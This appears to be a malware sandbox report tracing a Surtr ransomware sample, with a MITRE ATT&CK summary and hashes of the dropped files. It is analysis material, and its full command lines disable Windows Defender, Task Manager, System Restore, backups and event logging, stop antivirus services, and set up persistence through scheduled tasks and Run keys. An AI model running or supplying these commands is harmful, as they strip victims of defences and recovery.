C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵PID:1264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵PID:1112
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵PID:1536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵PID:1972
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵PID:1236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f2⤵PID:2040
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f3⤵PID:1732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f2⤵PID:1952
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f3⤵PID:1324
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f2⤵PID:1956
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f3⤵PID:1148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f2⤵PID:1744
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵PID:1416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f2⤵PID:1676
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵PID:2012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f2⤵PID:1508
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f3⤵PID:1504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f2⤵PID:1224
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f3⤵PID:1600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f2⤵PID:1708
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f3⤵PID:1932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f2⤵PID:1388
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f3⤵PID:1344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f2⤵PID:1596
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵PID:1944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f2⤵PID:984
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f3⤵PID:1164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f2⤵PID:868
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f3⤵PID:1608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f2⤵PID:1412
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f3⤵PID:1804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f2⤵PID:1432
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f3⤵PID:1492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f2⤵PID:1048
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f3⤵PID:316
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f2⤵PID:1696
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f3⤵PID:1060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f2⤵PID:584
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f3⤵PID:1760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f2⤵PID:1548
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f3⤵PID:708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f2⤵PID:1764
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f3⤵PID:832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f2⤵PID:804
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f3⤵PID:1384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f2⤵PID:1644
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f3⤵PID:204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f2⤵PID:212
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f2⤵PID:228
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f3⤵PID:236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir "C:\ProgramData\Service"2⤵PID:840
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"2⤵PID:1692
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"2⤵
- Drops startup file
PID:1500
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"2⤵
- Drops startup file
PID:1648
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"2⤵PID:1712
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Public_DATA.surt" "%TEMP%\Service\Public_DATA.surt"2⤵PID:1968
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Private_DATA.surt" "%TEMP%\Service\Private_DATA.surt"2⤵PID:636
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"2⤵PID:1064
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"2⤵PID:1100
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"2⤵PID:1536
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"2⤵PID:960
-
C:\Windows\system32\attrib.exeattrib +R /S "C:\ProgramData\Service"3⤵
- Views/modifies file attributes
PID:1792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"2⤵PID:1796
-
C:\Windows\system32\attrib.exeattrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"3⤵
- Views/modifies file attributes
PID:1780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F2⤵PID:2036
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
PID:516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F2⤵PID:1148
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F3⤵
- Creates scheduled task(s)
PID:1956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"2⤵
- Drops startup file
PID:1416
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f2⤵PID:1744
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
- Adds Run key to start application
PID:2012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f2⤵PID:1676
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
- Adds Run key to start application
PID:1504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f2⤵PID:1508
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
- Adds Run key to start application
PID:1600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f2⤵PID:1224
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
- Adds Run key to start application
PID:1932
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:576
-
C:\Windows\system32\net.exenet stop "Antivirus"1⤵PID:628
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Antivirus"2⤵PID:1400
-
-
C:\Windows\system32\net.exenet stop "BackupExecDeviceMediaService"1⤵PID:636
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecDeviceMediaService"2⤵PID:984
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeSRS"1⤵PID:1732
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f1⤵PID:220
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Bypass User Account Control
1Disabling Security Tools
1File Deletion
2Hidden Files and Directories
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD5bc24259426b2a386da4530436bf3296e
SHA1a69b89882e9735ddc329faa719abdc4314f30adb
SHA256084431c01d52d58fd51bba58d44dc7f0942f0bcbb959749db131903f06410818
SHA5129759193a5baa1af795a0882709627e4704cf0a339777f1954d9b0d0ffb8fd4a82caab569f19a245a37caa1ead399831a8cf0fd8442048ad49a6ced307dcab25b
-
Filesize
614B
MD53edb25c3ee860ae35725913addc5ac52
SHA16040120e5cb599d01a29298c00d2ce40adaa7dd6
SHA256c54d52735ae6434b423b8e0f99e624b523ce404eea5c6f356593a9b616e76bc5
SHA5129b92cd7d21b5db2fa27d56bba9c27341c5836c9a796111b9483af61692edcd9f3ac45ead116d5e9ed82df29eec44e7ee3fdfede5405dabc8aea37baf726ff0c7
-
Filesize
14B
MD51761db4ca7cf70233fd9df40ec6e92c1
SHA1aeadc4f0ff1d69cad6d16ce43310715b76121418
SHA2566612fbe1b664ece9ead9aaa6d8702edea7f3cd4bc1505f4f669e07539973ac81
SHA51286b86b78e14e57ab607f177573d043577d86f91e5e02490137715add50a5da2c74140487c7969c976d18f069890e6ce5cf520f3fc2c3fead6a8c22a7c7ad0cfe
-
Filesize
1KB
MD5240742337ee5dafddc1a89952c017365
SHA10b0ee664192e8a6111c00b72d25e2491fe419567
SHA2566445e8b373a3fb3b32c7c83cb887a11a5c3d07e39e13a69be666415568a69fb3
SHA51253fb3b0c90287a6c35e2170a8452be0ab2694158663c13afc89f5853f06a801090328650a9a28736e0e75d51b95bcc5863c340637df2020294f39b81451d057b
-
Filesize
204B
MD59d932e747aba27b73fc3156cff66f880
SHA1128db23e16a7f72cde51e8aea86e506e8d934745
SHA2562b472fe1c757c3e5c46e85b84785a15028b7df0f937680fe42bffcdfb480fcbf
SHA5121c596f109cb5ee18d8fa406c412ddc536d9b2f5b3d554555215af3f92e3d7b54414186a211a509908a63d400817c3af457d61bb8d5a911464e72d504578bd622
-
Filesize
8KB
MD5bc24259426b2a386da4530436bf3296e
SHA1a69b89882e9735ddc329faa719abdc4314f30adb
SHA256084431c01d52d58fd51bba58d44dc7f0942f0bcbb959749db131903f06410818
SHA5129759193a5baa1af795a0882709627e4704cf0a339777f1954d9b0d0ffb8fd4a82caab569f19a245a37caa1ead399831a8cf0fd8442048ad49a6ced307dcab25b
-
Filesize
614B
MD53edb25c3ee860ae35725913addc5ac52
SHA16040120e5cb599d01a29298c00d2ce40adaa7dd6
SHA256c54d52735ae6434b423b8e0f99e624b523ce404eea5c6f356593a9b616e76bc5
SHA5129b92cd7d21b5db2fa27d56bba9c27341c5836c9a796111b9483af61692edcd9f3ac45ead116d5e9ed82df29eec44e7ee3fdfede5405dabc8aea37baf726ff0c7
-
Filesize
333KB
MD5393e9f112cc999ebd9333877bcc7535e
SHA1ed65581b6c3980b3ddf623a4d2f61ce08ce59bdf
SHA256459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712
SHA512021116a238f84e003ba6a5817b4d6ed27637ed6bc1d6d424533813d70964953c9deb1c62e94bae89db7c59f09dcc76ee5c92ad66c8e7688cd0d4643bc6d72c83